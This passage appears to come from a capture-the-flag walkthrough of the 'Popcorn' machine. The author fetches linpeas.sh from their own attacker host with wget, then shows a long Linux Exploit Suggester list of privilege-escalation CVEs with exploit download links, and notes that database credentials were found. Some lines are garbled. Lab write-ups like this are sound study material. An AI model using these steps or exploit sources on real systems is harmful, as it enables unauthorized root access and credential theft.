PEAS
www-data@popcorn:/dev/shm$ wget http://10.10.14.5:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-02-02 13:12:24-- http://10.10.14.5:8000/linpeas.sh
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: `linpeas.sh'
100%[======================================>] 827,827 2.56M/s in 0.3s
2023-02-02 13:12:24 (2.56 MB/s) - `linpeas.sh' saved [827827/827827]
Delivery complete
Executing PEAS
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
details: http://vulnfactory.org/exploits/full-nelson.c
exposure: highly probable
tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
download url: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2016-5195] dirtycow
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: probable
tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
download url: https://www.exploit-db.com/download/40611
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: probable
tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
download url: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2010-3904] rds
details: http://www.securityfocus.com/archive/1/514379
exposure: probable
tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},[ ubuntu=10.10|9.10 ],fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
download url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
details: https://www.exploit-db.com/exploits/17787/
exposure: probable
rver}gs: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-se
download url: https://www.exploit-db.com/download/17787
[+] [CVE-2010-1146] reiserfs
details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
exposure: probable
tags: [ ubuntu=9.10 ]
download url: https://jon.oberheide.org/files/team-edward.py
[+] [CVE-2010-0832] PAM MOTD
details: https://www.exploit-db.com/exploits/14339/
exposure: probable
tags: [ ubuntu=9.10|10.04 ]
download url: https://www.exploit-db.com/download/14339
comments: SSH access to non privileged user is needed
[+] [CVE-2021-3156] sudo Baron Samedit
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: mint=19,ubuntu=18|20, debian=10
download url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
exposure: less probable
tags: mint=19
download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
details: http://www.openwall.com/lists/oss-security/2017/02/22/3
exposure: less probable
tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
download url: https://www.exploit-db.com/download/41458
comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
details: https://seclists.org/oss-sec/2017/q1/184
exposure: less probable
download url: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
exposure: less probable
download url: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
exposure: less probable
tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
exposure: less probable
download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-0358] ntfs-3g-modprobe
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
exposure: less probable
tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
ffensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
exposure: less probable
tags: ubuntu=16.04.1
download url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
8 affecteds: Also MariaDB ver<10.1.18 and ver<10.0.2
[+] [CVE-2014-5119] __gconv_translit_find
details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
exposure: less probable
tags: debian=6
download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
exposure: less probable
download url: https://www.exploit-db.com/download/33516
[+] [CVE-2013-0268] msr
details: https://www.exploit-db.com/exploits/27297/
exposure: less probable
download url: https://www.exploit-db.com/download/27297
[+] [CVE-2010-4347] american-sign-language
details: https://www.exploit-db.com/exploits/15774/
exposure: less probable
download url: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3437] pktcdvd
details: https://www.exploit-db.com/exploits/15150/
exposure: less probable
tags: ubuntu=10.04
download url: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
details: https://www.exploit-db.com/exploits/15023/
exposure: less probable
tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
download url: https://www.exploit-db.com/download/15023
[+] [CVE-2010-3081] video4linux
details: https://www.exploit-db.com/exploits/15024/
exposure: less probable
tags: RHEL=5
download url: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
details: https://www.exploit-db.com/exploits/14814/
exposure: less probable
tags: ubuntu=10.04{kernel:2.6.32-24-generic}
download url: https://www.exploit-db.com/download/14814
[+] [CVE-2009-3547] pipe.c 3
details: https://www.exploit-db.com/exploits/10018/
exposure: less probable
download url: https://www.exploit-db.com/download/10018
[+] [CVE-2009-3547] pipe.c 2
details: https://www.exploit-db.com/exploits/33322/
exposure: less probable
download url: https://www.exploit-db.com/download/33322
[+] [CVE-2009-3547] pipe.c 1
details: https://www.exploit-db.com/exploits/33321/
exposure: less probable
download url: https://www.exploit-db.com/download/33321
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] american-sign-language
CVE-2010-4347
source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
source: http://www.exploit-db.com/exploits/40616
[4] do_pages_move
alt: sieve CVE-2010-0415
source: Spenders Enlightenment
[5] exploit_x
CVE-2018-14665
source: http://www.exploit-db.com/exploits/45697
[6] half_nelson1
alt: econet CVE-2010-3848
source: http://www.exploit-db.com/exploits/17787
[7] half_nelson2
alt: econet CVE-2010-3850
source: http://www.exploit-db.com/exploits/17787
[8] half_nelson3
alt: econet CVE-2010-4073
source: http://www.exploit-db.com/exploits/17787
[9] msr
CVE-2013-0268
source: http://www.exploit-db.com/exploits/27297
[10] pipe.c_32bit
CVE-2009-3547
source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[11] pktcdvd
CVE-2010-3437
source: http://www.exploit-db.com/exploits/15150
[12] ptrace_kmod2
a32syscall,robert_you_suck CVE-2010-3301
source: http://www.exploit-db.com/exploits/15023
[13] rawmodePTY
CVE-2014-0196
source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[14] rds
CVE-2010-3904
source: http://www.exploit-db.com/exploits/15285
[15] reiserfs
CVE-2010-1146
source: http://www.exploit-db.com/exploits/12130
[16] video4linux
CVE-2010-3081
source: http://www.exploit-db.com/exploits/15024So many vulnerabilities found as the target system is extremely old
There is a compiler installed.
This is nice as I wouldn’t need to compile exploits remotely
More detailed SUID binaries
The /selinux directory is new to me
PEAS also picked up the DB credentials